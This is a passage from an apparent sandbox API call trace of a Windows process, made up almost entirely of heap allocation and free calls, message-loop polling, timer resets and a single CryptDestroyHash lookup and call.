returned 0 [0243.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0243.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0243.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0243.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0243.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0243.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0243.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0243.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0243.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0243.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0243.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0243.362] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0243.362] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0243.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0243.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0243.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0243.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0243.402] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 1 [0243.402] TranslateMessage (lpMsg=0x8cf3b8) returned 0 [0243.402] DispatchMessageW (lpMsg=0x8cf3b8) returned 0x0 [0243.402] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0243.402] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0243.402] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0243.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0243.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0243.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0243.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0243.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0243.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0243.403] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0243.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0243.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0243.403] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0243.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0243.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0243.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0243.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0243.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0243.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0243.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50fc8 [0243.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510d0 [0243.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51088 [0243.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0243.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50fe0 [0243.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0243.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0243.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51220 [0243.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51298 [0243.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51058 [0243.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0243.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510e8 [0243.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0243.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0243.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511f0 [0243.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0243.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51238 [0243.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510b8 [0243.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0243.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51190 [0243.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51100 [0243.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0243.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511d8 [0243.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51010 [0243.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0243.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0243.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0243.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f041f8 [0243.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0243.405] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0243.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f041f8 | out: hHeap=0x970000) returned 1 [0243.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0243.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51070 [0243.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0243.405] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0243.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0243.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0243.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0243.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0243.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0243.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0243.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0243.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0243.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0243.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0243.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0243.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0243.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0243.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0243.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0243.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0243.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0243.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0243.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0243.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0243.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0243.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0243.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0243.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0243.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0243.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0243.406] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0243.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0243.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0243.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0243.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0243.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0243.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0243.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0243.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0243.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0243.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0243.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0243.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0243.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0243.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0243.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0243.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0243.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0243.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0243.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0243.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0243.407] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0243.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69a08 [0243.407] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69a08, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0243.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0243.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0243.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0243.408] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0243.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0243.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0243.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0243.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0243.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0243.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0243.408] CryptDestroyHash (hHash=0xa872d0) returned 1 [0243.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978528 [0243.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0243.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0243.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0243.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0243.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0243.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0243.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0243.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0243.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0243.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0243.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0243.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0243.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0243.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0243.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0243.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0243.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0243.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0243.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0243.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0243.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0243.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0243.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0243.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0243.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0243.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0243.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0243.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0243.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0243.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0243.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0243.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0243.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0243.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978528 | out: hHeap=0x970000) returned 1 [0243.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0243.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0243.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0243.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0243.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0243.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0243.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0243.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0243.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0243.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0243.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0243.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0243.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0243.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0243.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0243.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0243.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0243.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0243.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0243.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0243.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0243.412] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0243.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0243.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0243.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0243.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0243.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0243.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0243.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0243.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0243.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0243.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0243.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0243.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0243.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0243.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0243.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0243.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0243.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0243.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0243.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0243.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0243.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0243.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0243.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0243.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0243.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0243.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0243.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0243.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0243.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0243.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0243.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0243.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0243.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0243.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0243.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0243.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0243.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0243.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0243.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0243.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0243.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0243.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0243.414] HeapFree (in: 